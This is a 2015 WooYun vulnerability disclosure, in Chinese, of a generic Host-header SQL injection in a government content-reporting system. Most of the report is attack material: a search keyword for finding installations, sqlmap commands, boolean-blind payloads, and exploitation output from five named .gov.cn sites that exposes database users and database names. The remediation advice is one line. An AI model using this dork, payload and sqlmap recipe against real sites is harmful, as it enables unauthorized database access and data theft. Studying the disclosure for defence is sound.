漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-093983
漏洞标题:某内容保障信息报送系统存在通用型SQL注入
相关厂商:呼和浩特市汇联科技有限公司
漏洞作者: 路人甲
提交时间:2015-01-29 18:50
修复时间:2015-04-29 18:52
公开时间:2015-04-29 18:52
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-01-29: 细节已通知厂商并且等待厂商处理中
2015-02-03: 厂商已经确认,细节仅向厂商公开
2015-02-06: 细节向第三方安全合作伙伴开放
2015-03-30: 细节向核心白帽子及相关领域专家公开
2015-04-09: 细节向普通白帽子公开
2015-04-19: 细节向实习白帽子公开
2015-04-29: 细节向公众公开
简要描述:
某内容保障信息报送系统存在通用型SQL注入
详细说明:
搜索关键字:内容保障信息报送系统 呼和浩特市汇联科技有限公司
注入点:host头
测试方法:将提交的请求存入txt文本,然后用sqlmap跑下
Sqlmap py -r *.txt --level=5 --dbs --current-user --current-db
1、
GET /login.jsp HTTP/1.1
Host: www.jnq.gov.cn
X-Requested-With: XMLHttpRequest
Referer: http://www.jnq.gov.cn/login.jsp
Cookie: JSESSIONID=CCF374B8FE1A234B38207C18D8A9BF91
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Sqlmap py -r 1s.txt --level=5 --dbs --current-user --current-db
sqlmap identified the following injection points with a total of 10727 HTTP(s) r
equests:
---
Place: Host
Parameter: Host
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: www.jnq.gov.cn') AND 7338=7338 AND ('OugQ'='OugQ
---
[08:37:56] [INFO] testing MySQL
[08:37:57] [WARNING] the back-end DBMS is not MySQL
[08:37:57] [INFO] testing Oracle
[08:37:57] [WARNING] the back-end DBMS is not Oracle
[08:37:57] [INFO] testing PostgreSQL
[08:37:57] [WARNING] the back-end DBMS is not PostgreSQL
[08:37:57] [INFO] testing Microsoft SQL Server
[08:37:57] [INFO] confirming Microsoft SQL Server
[08:37:58] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: JSP, Apache 2.2.4
back-end DBMS: Microsoft SQL Server 2005
[08:37:58] [INFO] fetching current user
[08:37:58] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[08:37:58] [INFO] retrieved: sa
current user: 'sa'
[08:38:12] [INFO] fetching current database
[08:38:12] [INFO] retrieved: netDatabase
current database: 'netDatabase'
[08:38:48] [INFO] fetching database names
[08:38:48] [INFO] fetching number of databases
[08:38:48] [INFO] retrieved:
[08:38:48] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' and/or switch '--hex'
[08:38:48] [ERROR] unable to retrieve the number of databases
[08:38:48] [INFO] retrieved: netDatabase
[08:39:22] [INFO] retrieved: master
[08:39:41] [INFO] retrieved: tempdb
[08:40:03] [INFO] retrieved: model
[08:40:21] [INFO] retrieved: msdb
[08:40:35] [INFO] retrieved: AdventureWorksDW
[08:41:24] [INFO] retrieved: AdventureWorks
[08:42:06] [INFO] retrieved: netDatabase
[08:42:43] [INFO] retrieved: cyhq_1
[08:43:05] [INFO] retrieved:
available databases [9]:
[*] AdventureWorks
[*] AdventureWorksDW
[*] cyhq_1
[*] master
[*] model
[*] msdb
[*] netDatabase
[*] tempdb
2、
GET /login.jsp HTTP/1.1
Host: www.shiguai.gov.cn
X-Requested-With: XMLHttpRequest
Referer: http://www.shiguai.gov.cn/login.jsp
Cookie: JSESSIONID=67DFBF1843F69A1054CBBD346C8A5140
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Sqlmap py -r 1s.txt --level=5 --dbs --current-user --current-db
sqlmap identified the following injection points with a total of 10760 HTTP(s) r
equests:
---
Place: Host
Parameter: Host
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: www.shiguai.gov.cn') AND 9995=9995 AND ('fITX'='fITX
---
[10:00:17] [INFO] testing MySQL
[10:00:18] [WARNING] the back-end DBMS is not MySQL
[10:00:18] [INFO] testing Oracle
[10:00:18] [WARNING] the back-end DBMS is not Oracle
[10:00:18] [INFO] testing PostgreSQL
[10:00:18] [WARNING] the back-end DBMS is not PostgreSQL
[10:00:18] [INFO] testing Microsoft SQL Server
[10:00:18] [INFO] confirming Microsoft SQL Server
[10:00:19] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
[10:00:19] [INFO] fetching current user
[10:00:19] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[10:00:19] [INFO] retrieved: sasa123
current user: 'sasa123'
[10:00:33] [INFO] fetching current database
[10:00:33] [INFO] retrieved: netDataBase
current database: 'netDataBase'
[10:01:19] [INFO] fetching database names
[10:01:19] [INFO] fetching number of databases
[10:01:19] [INFO] retrieved: 8
[10:01:21] [INFO] retrieved: Excel
[10:02:02] [CRITICAL] connection timed out to the target url or proxy, sqlmap is
going to retry the request
UpSelect
[10:02:23] [INFO] retrieved: master
[10:02:39] [INFO] retrieved: model
[10:02:53] [INFO] retrieved: msdb
[10:03:05] [INFO] retrieved: netDataBase
[10:03:32] [INFO] retrieved: ReportServer
[10:04:02] [INFO] retrieved: ReportServerTempDB
[10:04:47] [INFO] retrieved: tempdb
available databases [8]:
[*] ExcelUpSelect
[*] master
[*] model
[*] msdb
[*] netDataBase
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
3、
GET /login.jsp HTTP/1.1
Host: www.nmqs.gov.cn
X-Requested-With: XMLHttpRequest
Referer: http://www.nmqs.gov.cn/login.jsp
Cookie: JSESSIONID=87F8AD9C9C90BBCE2C0F80B0E5AF8DDA
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Sqlmap py -r 2.txt --level=5 --dbs --current-user --current-db
sqlmap identified the following injection points with a total of 10792 HTTP(s) r
equests:
---
Place: Host
Parameter: Host
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: www.nmqs.gov.cn') AND 6046=6046 AND ('QbGd'='QbGd
---
[10:36:11] [INFO] testing MySQL
[10:36:11] [WARNING] the back-end DBMS is not MySQL
[10:36:11] [INFO] testing Oracle
[10:36:11] [WARNING] the back-end DBMS is not Oracle
[10:36:11] [INFO] testing PostgreSQL
[10:36:11] [WARNING] the back-end DBMS is not PostgreSQL
[10:36:11] [INFO] testing Microsoft SQL Server
[10:36:11] [INFO] confirming Microsoft SQL Server
[10:36:12] [INFO] the back-end DBMS is Microsoft SQL Server
back-end DBMS: Microsoft SQL Server 2008
[10:36:12] [INFO] fetching current user
[10:36:12] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[10:36:12] [INFO] retrieved: sasa123
current user: 'sasa123'
[10:36:26] [INFO] fetching current database
[10:36:26] [INFO] retrieved: netDatabase
current database: 'netDatabase'
[10:36:48] [INFO] fetching database names
[10:36:48] [INFO] fetching number of databases
[10:36:48] [INFO] retrieved: 8
[10:36:50] [INFO] retrieved: master
[10:37:06] [INFO] retrieved: model
[10:37:34] [INFO] retrieved: msdb
[10:37:46] [INFO] retrieved: netDatabase
[10:38:19] [INFO] retrieved: qsjj_database
[10:38:51] [INFO] retrieved: ReportServer
[10:39:26] [INFO] retrieved: ReportServerTempDB
[10:40:14] [INFO] retrieved: tempdb
available databases [8]:
[*] master
[*] model
[*] msdb
[*] netDatabase
[*] qsjj_database
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
4、
GET /login.jsp HTTP/1.1
Host: www.nmfzb.gov.cn
X-Requested-With: XMLHttpRequest
Referer: http://www.nmfzb.gov.cn/login.jsp
Cookie: JSESSIONID=5D65065D4E98D28413A4207E36A7E320
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Sqlmap py -r 1s.txt --level=5 --dbs --current-user --current-db
sqlmap identified the following injection points with a total of 10794 HTTP(s) r
equests:
---
Place: Host
Parameter: Host
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: www.nmfzb.gov.cn') AND 6087=6087 AND ('MZsr'='MZsr
---
[10:40:30] [INFO] testing MySQL
[10:40:30] [WARNING] the back-end DBMS is not MySQL
[10:40:30] [INFO] testing Oracle
[10:40:30] [WARNING] the back-end DBMS is not Oracle
[10:40:30] [INFO] testing PostgreSQL
[10:40:30] [WARNING] the back-end DBMS is not PostgreSQL
[10:40:30] [INFO] testing Microsoft SQL Server
[10:40:30] [INFO] confirming Microsoft SQL Server
[10:40:31] [INFO] the back-end DBMS is Microsoft SQL Server
back-end DBMS: Microsoft SQL Server 2005
[10:40:31] [INFO] fetching current user
[10:40:31] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[10:40:31] [INFO] retrieved: sa
current user: 'sa'
[10:40:34] [INFO] fetching current database
[10:40:34] [INFO] retrieved: fpbnetDataBase
current database: 'fpbnetDataBase'
[10:41:10] [INFO] fetching database names
[10:41:10] [INFO] fetching number of databases
[10:41:10] [INFO] retrieved: 7
[10:41:11] [INFO] retrieved: adminlaws_nmg
[10:41:31] [INFO] retrieved: adminlaws_nmgfy
[10:41:56] [INFO] retrieved: fzbnetDataBase
[10:42:19] [INFO] retrieved: master
[10:42:30] [INFO] retrieved: model
[10:42:39] [INFO] retrieved: msdb
[10:42:47] [INFO] retrieved: tempdb
available databases [7]:
[*] adminlaws_nmg
[*] adminlaws_nmgfy
[*] fzbnetDataBase
[*] master
[*] model
[*] msdb
[*] tempdb
5、
GET /login.jsp HTTP/1.1
Host: www.nmgsports.gov.cn
X-Requested-With: XMLHttpRequest
Referer: http://www.nmgsports.gov.cn/login.jsp
Cookie: JSESSIONID=A4CF0C95F80A44D77B046F60296198C2
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Sqlmap py -r 2.txt --level=5 --dbs --current-user --current-db
sqlmap identified the following injection points with a total of 10753 HTTP(s) r
equests:
---
Place: Host
Parameter: Host
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: www.nmgsports.gov.cn') AND 9579=9579 AND ('iNtC'='iNtC
---
[11:18:08] [INFO] testing MySQL
[11:18:08] [WARNING] the back-end DBMS is not MySQL
[11:18:08] [INFO] testing Oracle
[11:18:08] [WARNING] the back-end DBMS is not Oracle
[11:18:08] [INFO] testing PostgreSQL
[11:18:08] [WARNING] the back-end DBMS is not PostgreSQL
[11:18:08] [INFO] testing Microsoft SQL Server
[11:18:08] [INFO] confirming Microsoft SQL Server
[11:18:09] [INFO] the back-end DBMS is Microsoft SQL Server
back-end DBMS: Microsoft SQL Server 2008
[11:18:09] [INFO] fetching current user
[11:18:09] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[11:18:09] [INFO] retrieved: sasa123
current user: 'sasa123'
[11:18:24] [INFO] fetching current database
[11:18:24] [INFO] retrieved: nmgtyjv2
current database: 'nmgtyjv2'
[11:18:34] [INFO] fetching database names
[11:18:34] [INFO] fetching number of databases
[11:18:34] [INFO] retrieved: 7
[11:18:35] [INFO] retrieved: master
[11:18:46] [INFO] retrieved: model
[11:18:55] [INFO] retrieved: msdb
[11:19:02] [INFO] retrieved: nmgtyjv2
[11:19:16] [INFO] retrieved: ReportServer
[11:19:39] [INFO] retrieved: ReportServerTempDB
[11:20:16] [INFO] retrieved: tempdb
available databases [7]:
[*] master
[*] model
[*] msdb
[*] nmgtyjv2
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
漏洞证明:
已证明
修复方案:
过滤特殊字符
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:14
确认时间:2015-02-03 14:58
厂商回复:
CNVD未直接复现所述情况,按照漏洞报送者所述情况整理通报,转由CNCERT下发给内蒙古分中心,由内蒙古分中心后续协调网站管理单位处
最新状态:
暂无